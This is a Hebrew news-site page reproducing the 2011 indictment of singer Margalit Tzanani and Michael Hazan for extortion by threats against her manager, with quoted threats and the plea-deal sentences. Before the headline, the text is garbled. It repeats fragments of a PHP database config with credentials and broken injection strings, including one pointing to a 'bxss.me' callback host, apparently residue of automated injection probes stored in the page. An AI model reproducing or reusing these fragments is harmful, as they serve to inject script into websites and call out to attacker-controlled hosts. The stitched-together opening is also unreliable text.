$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> הוגש כתב אישום נגד מרגלית צנעני בחשד לסחיטה באיומים
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

מרגלית צנעני מואשמת בסחיטה באיומים

תאריך: 29/08/2011 12:27   מחבר: מערכת האתר

מערכת האתר לא נוהגת בדרך כלל להעלות כתבי אישום כמות שהם. הואיל וכתב האישום שהוגש נגד מרגלית צנעני ומיכאל חזן עושה דברה ושליחותה מדבר בעד עצמו ואין מה להוסיף פרשנות לתוכנו, מצאנו לנכון להעלותו לאתר כדי לאפשר לגולשים להתרשם ממנו ומהעבירות המיוחסות לנאשמים.

א.     העובדות:

1.    נאשמת 1 הינה אמנית מתחום הזמר, והועסקה בתקופה הרלבנטית לכתב האישום כשופטת בתכנית ערוץ 2, תחרות "כוכב נולד" (להלן- כוכב נולד).

2.     נאשם 2 הינו ידידו ומקורבו של שלום דומרני (להלן-דומרני), וכן ידידה הקרוב של נאשמת 1. 

3.    אסף אדטגי (להלן- אטדגי), הנו אמרגן ומנהל אישי לאמנים שונים בתחום הזמר הישראלי. בתקופה הרלבנטית לכתב האישום, שימש אטדגי אמרגן וסוכן אישי  של נאשמת 1, ואף הכיר את נאשם 2.

4.    יוסי בן דוד (להלן- בן דוד) הינו כותב ומלחין שירים בתעשיית המוזיקה , וידיד משותף לנאשמים ולאטדגי.

5.    ירון אילן הינו איש תעשיית הבידור, בין היתר מנחה ומגיש תכניות בערוץ המוזיקה  24 וכן ברדיו ירושלים. בנוסף, ירון הינו מקורבו של דומרני וידידה הקרוב  של נאשמת 1 (להלן- ירון).

6.    במהלך שנת 2009 הכירה נאשמת 1 , מתוקף עבודתה ב"כוכב נולד", את הזמר עומר אדם (להלן- עומר). כתוצאה מכך, בין היתר, נוצר הקשר בין אטדגי  לבין עומר ואביו , יניב אדם (להלן- יניב).

7.    בעקבות האמור, החל אטדגי לשמש אמרגן ומנהל אישי, גם של עומר, תוך סיכום עם יניב, לפיו אטדגי יקבל 30% מהכנסותיו של עומר לאחר ניכוי הוצאות. במקביל, סיכם אטדגי עם נאשמת 1 כי יעביר אליה מחצית מכלל הכנסותיו מייצוגו את עומר.

8.    א.     בתאריך לא ידוע בתחילת שנת 2010, או בסמוך לכך, נתגלעו מחלוקות בין נאשמת 1 לאטדגי סביב חלוקת ההכנסות מעומר אדם, כמו גם בכל הקשור לאופן אמרגנותו של אטדגי את נאשמת 1 וחוסר שביעות הדדי בין השניים.

ב.     כתוצאה מסכסוך זה דרש אטדגי להשתחרר מייצוגו את נאשמת 1, והציע לקנות ממנה את חלקה בעומר. נאשמת 1 סירבה בתוקף לדרישותיו של אטדגי.

9.    א.     בתאריך 2-12-10, או בסמוך לכך, בעקבות המחלוקות שנתגלעו, פנו אטדגי ונאשמת 1 לבורר מוסכם, אשר פסק כי  אטדגי  ימשיך לעבוד עם נאשמת 1, הכול בכפוף ובהתאם לסיכומי העבר. לפיכך, יהיה על אטדגי להמשיך ולהעביר אל נאשמת 1 סך של 15% מכל הכנסותיו מייצוגו את עומר, ולהמשיך בשותפות בהכנסות מהזמר עומר בחלקים שווים.

ב.     בנוסף,  פסק הבורר, כי במידה ומי מהצדדים יבקש לסיים את ההתקשרות ביניהם, ההסכם בעניינו של עומר יוותר על כנו (להלן- פסק הבורר). 

ג.     במועד האמור, חתמה רק נאשמת 1 על פסק הבורר, לאור חוסר שביעות רצונו של אטגדי מתוצאותיו.

10.    א.     בסוף חודש דצמבר 2010 או תחילת חודש ינואר 2011, או בסמוך לכך,  פנתה נאשמת 1 לירון וביקשה ממנו כי יתווך בקיום פגישה בינה לבין דומרני על מנת שיפעל ליישוב הסכסוך עם אטדגי, בין היתר, גם לאור סירובו של האחרון לחתום על פסק הבורר. ירון נעתר מיידית  לבקשתה.

ב.     בעקבות זאת, ובסמוך לכך, הגיעה נאשמת 1 בצוותא עם ירון, אל ביתו של דומרני שם שוחחה עמו בדיסקרטיות אודות הסכסוך עם אטדגי.  

11.    א.     במהלך כל התקופה המאוחרת לפסק הבורר, בה ניהל אטדגי את אמרגנותה     של נאשמת 1, איבדה נאשמת 1 כל אמון  באטדגי, וחשדה כי הוא אינו מדווח לה דיווחי אמת על הכנסותיו מהופעותיו של עומר, וכתוצאה מכך מרמה אותה בכספים המגיעים לה על פי פסק הבורר.

ב.   חשדה של נאשמת 1 גבר, בין היתר, לאור דרישתו של אטדגי מנאשמת 1, כי יסתירו מיניב את העובדה, שנאשמת 1 הנה שותפה מלאה של אטדגי  בהכנסותיו מעומר. לאור זאת, דרשה נאשמת 1 מאטדגי,  כי בנה אסף יהיה צמוד אליו, ויוצג בפי כל כמנהל ושותף נוסף של עומר.

ג.  בנוסף, סברה נאשמת 1, כי אטדגי אינו מתייחס בצורה ראויה לבנה, אסף, כמו גם למקורביה שלה, (ובכללם גם לנאשם 2), מונע מהם כרטיסי להופעות ללא תשלום, ומתחמק מקביעת מועדים להופעותיו של עומר עבורם.

ד.  נאשמת 1 סברה, כי אטדגי משקיע את מירב מרצו בקידומו האמנותי של עומר, על פני קידומה שלה, ואף חשדה כי הוא  מעביר לביצועו של עומר, שירים,  אשר מלכתחילה  יועדו לה עצמה.

ה.  ככלל, סברה נאשמת 1, כי אטדגי מנהל את קידומה, האמנותי והמקצועי, בצורה נפסדת וכושלת. (כל האמור לעיל, להלן-   הסכסוך).

12.    א.   לאור חשדותיה אלו של נאשמת 1 כלפי אטדגי וטענותיה אליו, כמפורט לעיל,  החליטה נאשמת 1 לערב את נאשם 2, אותו הכירה כאדם המזרה אימה על כל סביבתו, בעל חזות והתנהלות מאיימת, ה"עוקר שיניים" לפרנסתו.  נאשמת 1 פנתה לנאשם 2 על מנת  שישמש לה כ"גב", בכל מהלך התנהלותה אל מול אטדגי, סביב טענותיה הרבות אליו.

ב.  נאשמת 1 סברה כי נוכחותו של נאשם 2 לצידה וקרבתו, כמו גם, קרבת חבריו אליה, תטיל פחד ומורא על אטדגי, כפי שאכן ארע בפועל.

ג.  נאשמת 1 סברה כי דרך פעולתה זו בצוותא עם נאשם 2, תניע את אטדגי, להיענות לכל רצונותיה, ובכללן דבקותו המלאה של אטדגי בפסק הבורר כולל שילוב בנה, אסף, בניהולו של עומר, והצגתו בפני כל, כמנהל שני של עומר, נוסף על אטדגי, דבר אשר יקנה לה, לשיטתה, פיקוח מקרוב על הכנסותיו "האמיתיות" של עומר. 

13. בתאריך שאינו  ידוע במהלך שנת 2011, או בסמוך לכך, קשרו הנאשמים קשר לסחוט באיומים את אטדגי , כדי להניעו להיענות לדרישותיהם השונות, וכל זאת תוך  שימוש בדרכי איום והפחדה אותם ינקוט נאשם 2 כלפי אטדגי, לבקשתה ועל דעתה של נאשמת 1, אך תוך הסוואת חלקה במעשים.  נאשמת 1 נהגה  להגיע אל מקום עבודתו של נאשם 2, ב"שוק השכונה" ברמת גן, ויידעה אותו  על פרטי   הסכסוך הקיים בינה לבין אטדגי. 

14. מעת לעת  דאגה נאשמת 1 ליידע, את אטדגי , במניפולטיביות,  על קרבתה הרבה  לנאשם 2 ולמשפחתו. נאשמת 1 הקפידה ליידע את אטדגי על כך כי נאשם 2  משמש לה ולבנה מלווה צמוד וקבוע, בהתנהלותם היומיומית, בארוחות שישי משותפות להם, וכל זאת במטרה לטעת באטדגי אימה ופחד, אשר יגרמו לו להיענות בחיוב לדרישותיה שלה ושל נאשם 2.

15. א.  בהמשך לאמור לעיל, במהלך החודשים אפריל – יולי 2011, (להלן- התקופה הרלבנטית לסחיטה באיומים), או בסמוך לכך, איים נאשם 2 על אטדגי, בידיעתה, ועל דעתה, של נאשמת 1, כי עליו "לפרגן" לבנה אסף במהלך הופעותיו של עומר. 

ב.  בנוסף, נאשם 2 דרש מאטדגי לארגן, לו ולחבריו, הופעות של עומר, על פי גחמותיו (של נאשם 2  וחבריו), במחירים נמוכים מכפי שדרש אטדגי מלכתחילה, ובמועדים המתאימים לנאשם 2 ולחבריו.

ג.  בהמשך למתואר לעיל, בתאריך 23-6-11 איים נאשם 2 על אטדגי באומרו: "אני אוציא אותך זין, ואני אשים לך גם זין בפה עכשיו. בסדר?! עכשיו תבדוק אותי, אני גם אשים לך את הזין שלי בפה שלך, שמעת מה אני אומר לך?! ולא תופיע ערב אחד בכל חודש 12... הינה מילה שלי, עכשיו תבדוק אותי... ביי יא אוכל בתחת, יא מניאק."

ד. בסמוך לאחר מכן, התקשר אטדגי לנאשם 2, במטרה לפייסו, ובתגובה המשיך נאשם 2 להלך אימים על אטדגי בצעקות: "אני אפגוש אותך בזמן שלי, שמעת?! אני אפגוש אותך במקום שמתאים לי, ובזמן שלי, יותר מזה אין לי מה לדבר איתך יא מזדיין בתחת...  אני אתן לך למצוץ, תזכור את המילים שאמרתי לך !!! תזכור אותם טוב טוב טוב !!! ואם יש מישהו שיכול לעזור לך, תקרא לו מהרגע!" 

ה. בנוסף, ניצל נאשם 2 את הפחד והאימה ששרו על אטדגי, ודרש ממנו עשרות כרטיסי חינם להופעות של עומר, בעבורו ובעבור חבריו.

16.  א.  ביום 24-6-11 איימה נאשמת 1 טלפונית, על אטדגי, באומרה: "אטדגי...  הם מתקשרים אליך לפעמים בתאריך של עומר אדם, תזהר בכבודם, ולא יקרה שום דבר!... עם מיכאל אתה צריך להיזהר!... תשמע, זה לא הפרסי מנתניה! וזה לא אנשים כאלה, הם טיפה אחרים... איתם אטדגי צריך להיזהר!... עם אלה על בהונות!...".

ב. במועד זה הדגיש אטדגי בפני נאשמת 1 כי היא הרי חברתם הטובה של נאשם 2 וחבריו, וכי מילה אחת שלה תרגיעם. בתגובה השיבה נאשמת 1 לאטדגי כי אינה רוצה להתערב, וכי התערבות שכזו אך ורק תחריף את העניינים.

ג. בסמוך לאחר השיחה האמורה, הגיעה נאשמת 1 לביתו של נאשם 2, ובנוכחותו התקשרה אל אטדגי. במעמד השיחה אמרה נאשמת 1 לאטדגי: "הוא רותח עליך, הוא אומר שפגעת בכבוד שלו ועשית אותו קטן! הוא אומר שביקש ממך תאריכים ואין אף תאריך!... אני מה זה מפחדת!... הוא רותח ברמות מפחידות!.. אימאל'ה!".

ד.  בשיחה נוספת אל אטדגי, כשנאשם 2 נמצא בצידה, צורח וצועק, אמרה נאשמת 1 לאטדגי: "אטדגי אתה עושה לי בעיות!... מה אני צריכה שתהיה לי שואת עולם בגללך?! אל תעשה לי צרות עם מיכאל! הוא על הסף! יש לי חבר אהוב, אל תעשה בעיות עם מיכאל!... מה שיקרה לי שבסוף אודר לחלוטין!... אז לא התכוונת, עכשיו אני צריכה להתחנן בשבילך, כי אתה עושה שגיאות חמורות ביותר!... אל תעשה את זה!!! אל תעשה את זה!!!... מי שמתחרווט נופל בפח!...".

ה. במעשיהם כמתואר לעיל, הטילו הנאשמים מורא ופחד על אטדגי והכל מתוך כוונה להניעו לפתור את הסכסוך הקיים לשביעות רצונם ולהניעו לעשות כרצונם.

17.  בהזדמנויות רבות, במהלך התקופה הרלבנטית, העבירו הנאשמים  מסרים מאיימים לאטדגי באמצעות חברם המשותף, יוסי בן דוד (ר' ס"ק 4) . מסרים אלו כללו רמיזות מאיימות, ישירות ועקיפות,  אשר יועדו להגיע לאוזניו של אטדגי . מספר פעמים אמר בן דוד לאטדגי כי עדיף לו (לאטדגי) "לחבק ולשמור על הילד", וכן ניסה לשכנעו לחתום על חוזה הבוררות ולהדגיש את שיתופו ומעורבותו של בנה של נאשמת 1, אסף, כמנהלו הנוסף של עומר. 

18. א. מחמת פחדו של אטדגי מהנאשמים, הוא נעתר לדרישותיהם, והחל לנהל את אמרגנותו של עומר בהתאם לגחמותיהם של הנאשמים ודבק בהסכם הבוררות עם נאשמת 1. בנוסף, שילב את בנה של נאשמת 1 כמנהל נוסף על עומר, ורומם את מעמדו בפני הסובבים אותו.

ג. כמו כן, קבע אטדגי הופעות לעומר אצל חבריהם של הנאשמים, במחירים נמוכים משמעותית מכפי שדרש מלכתחילה.
ד. בנוסף, מספר פעמים במהלך התקופה הרלבנטית לכתב האישום, העביר אטדגי לנאשם 2 ולחבריו עשרות כרטיסי, בשווי אלפי שקלים להופעותיו של עומר אדם. כך, באחת הפעמים במהלך חודש יוני 2011, הביא אטדגי אל מקום עבודתו של נאשם 2, בחנות "שוק השכונה" ברמת גן,  מספר רב של כרטיסים, בשווי אלפי שקלים, להופעותיו של עומר, לא לפני שוידא כי נאשם 2 אינו נוכח במקום, וזאת מחמת פחדו ממנו.

19.  באופן המתואר לעיל, איימו הנאשמים על אטדגי, והטילו עליו אימה ופחד, תוך שהביאוהו בכך לעשות מעשה.

20. במהלך התקופה הרלבנטית לאישום, הודתה נאשמת 1 מקרב לב לנאשם 2 על מעשיו עבורה ועבור בנה, ואמרה לו כי לא תשכח זאת לעולם.  נאשמת 1 אף ציינה בפני נאשם 2 כי בעבר לא היה לה "גב", וכי לעולם היא תהא "כסלע" עבורו. עוד הוסיפה נאשמת 1 כי גם לה עצמה יש כוחות משלה לעזור לנאשם 2.     

21. א.בתמורה למעשי האיום והסחיטה נגד אטדגי, נעתרה נאשמת 1 לבקשותיו וגחמותיו של נאשם 2 ושל חבריו.

ב. כך, בתאריך 1-6-11 ניקדה נאשמת 1, במהלך "כוכב נולד", מתוקף תפקידה כשופטת, את המתמודדת אורטל אדרי, באופן התואם את הניקוד שהעביר לה מבעוד מועד,  נאשם 2, "און ליין" באמצעות SMS,  במהלך השידור החי של התכנית.

ג. כך, בתאריך 14-6-11, ערב השידור החי של התכנית "כוכב נולד",  שוחחה נאשמת 1, טלפונית, בתיווכו של נאשם 2, עם שגיב טיירי (להלן-שגיב), שהיה אותה העת אסיר המרצה עונש מאסר, ואשר הינו קרוב משפחתו של המתמודד, לירון רמתי (להלן- רמתי). נאשמת 1 נענתה לדרישת נאשם 2 ושגיב, וציינה את שמו של שגיב, במהלך השידור החי בתום ביצוע שירו של רמתי, באומרה בפני כל: " מה אתה חושב שגיב טיירי היה אומר על זה...".

22. במהלך חודש יולי 2011, או בסמוך לכך, הציע נאשם 2 לנאשמת 1 לנסוע עמו  לפגישה עם חברו, דומרני, במקום שהותו במעצר בית, בחווה במושב עוצם, בדרום הארץ (להלן- החווה). נאשמת 1 נענתה להצעה.

23. בתאריך 20-7-11 נסעו הנאשמים לחווה, לפגישה עם דומרני (להלן- הפגישה). בפתח הפגישה פנה דומרני לנאשמת 1, ושאל אותה אם הסתדרו ענייניה עם אטדגי, ואם "הוא מתנהג יפה". דומרני הבטיח לנאשמת 1 כי אטדגי "רועד ומשלשל מפחד ולא יזוז ממטר!". נאשמת 1 שבה והודתה מקרב לב לנאשם 2, בפני דומרני, על כל מעשיו בעניינו של  אטדגי.

24.  א.במהלך הפגישה, בתמורה למעשים שעשה נאשם 2 עבור נאשמת 1, ביקש דומרני את עזרתה של נאשמת 1, למהלך שטווה בצוותא עם נאשם 2. מהלך זה כלל את ביסוסו של נאשם 2 כאמרגן אמנים עצמאי, מאחוריו יעמוד דומרני, באופן סמוי.

ב. במסגרת התכנית, תפקידה של נאשמת 1 יהיה לגייס את מתמודדי גמר "כוכב נולד", למשרד האמרגנות החדש, בניהולו של  נאשם 2.

ג. דומרני הוסיף ואמר, כי במידת הצורך, "יפדה" את מתמודדי הגמר ממסגרת ההפקה בה הם חתומים, וביקש את עזרתה של נאשמת 1 למהלך. נאשמת 1 הבהירה לנאשם 2 ולדומרני כי מכיוון שמתמודדי הגמר חתומים מבעוד מועד אצל הפקת התכנית, אינה יכולה לפעול בגלוי, עם זאת הבטיחה כי תסייע מהצד, בחשאי, למהלך זה, לאור קרבתה למתמודדי הגמר.
    (להלן- התכנית).

25. א. במהלך הפגישה אמר דומרני לנאשמת 1, על דעת נאשם 2,  כי יוכל לקדם את התכנית, כמו גם את ענייניה האישיים של נאשמת 1, באמצעות אנשי תעשיית המוסיקה אשר הם "אנשים שלו": ירון, והשדרן אלי ("אליקו") כהן מתחנת רדיו "לב המדינה".

ב. במהלך הפגישה שוחח דומרני, כשנאשם 2 לצידו, באמצעות מכשירהּ הסלולארי של נאשמת 1, עם ירון, והורה לו להיפגש עם נאשמת 1, כבר בימים הקרובים, לצורך קידום התכנית. ירון נענה מיד לבקשה.

ג. בתום הפגישה, הבטיחה נאשמת 1, לדומרני ולנאשם 2, לקדם את המהלך ולסייע להוצאת התכנית  מן הכוח אל הפועל.


26. א. לשם קידום התכנית ומימושה, שוחחה  נאשמת 1 בו ביום, טלפונית,  עם ירון, בנוכחותו של נאשם 2, ופירטה בפניו את שלבי התכנית. נאשמת 1 הדגישה בפני ירון, כי התכנית חייבת להיכנס להילוך גבוה.

ב.  בשיחה נוספת, הדגישה נאשמת 1 בפני ירון, כי נאשם 2 ודומרני הם "השומרים שלה" מפניו של אטדגי,  וכי שניהם (נאשמת 1 וירון ), מחויבים לסייע לדומרני ולנאשם 2.  ירון שב והבטיח באוזניה את מחויבותו האישית לדומרני כמו גם למהלך הנרקם. 

27. בתאריך 26-7-11 נערך שלב הגמר של תכנית "כוכב נולד" בה זכה המתמודד רמתי במקום השלישי.

28.  בתאריך 27-7-11 התקיימה פגישה בין הנאשמים לבין ירון אילן ועוזרו,  לקידום התוכנית. הנאשמים סיכמו עם ירון כי לשם קידום התוכנית, יתרכזו במתמודדים רמתי ולידור סולטן.

29.  א. בתאריך 28-7-11 שוחחה נאשמת 1, טלפונית, עם רמתי. במהלך השיחה שידלה נאשמת 1 את רמתי והדריכה אותו כיצד להשתחרר מחוזהו הקיים עם "טדי הפקות", וכי אסור לו בתכלית האיסור להישאר תחת אותו החוזה.

ב. עוד במעמד השיחה, הציעה נאשמת 1 לרמתי אמרגן אחר, ה"מקושר היטב", אשר ישקיע בו וייצגו, וכל זאת מבלי ליידע אותו בדבר מעורבותם של דומרני ושל נאשם 2 במהלך. 

ג.  בתום השיחה נדברו השניים להיפגש תוך יומיים, ב"ארבע עיניים", לא לפני שנאשמת 1 הזהירה את רמתי שוב ושוב  "לא להסגירה", ולא לומר דבר לאיש על שיחתם.

30. התכנית שתכננו הנאשמים בצוותא חדא, עם דומרני, בעבור מעשה הסחיטה נכשלה הודות להתערבות משטרת ישראל.

   הוראות החיקוק לפיהן מואשמים הנאשמים:


1.    קשירת קשר לבצוע פשע (סחיטה באיומים)  - עבירה לפי סעיף  499 (א)(1) לחוק העונשין, התשל"ז – 1977 (להלן: "החוק").

2.    סחיטה באיומים (בצוותא חדא) - עבירה לפי סעיף 428 (סיפא) בצירוף סעיף 29(ב) לחוק.

 

עסקת טיעון

במסגרת עסקת טיעון שקבלה את אישור בית המשפט המחוזי, נגזר על מרגלית צנעני 6 חודשי מאסר שיומרו בעבודות שירות לתועלת הציבור. על מיכאל חזן נגזרו 10 חודשי מאסר בפועל.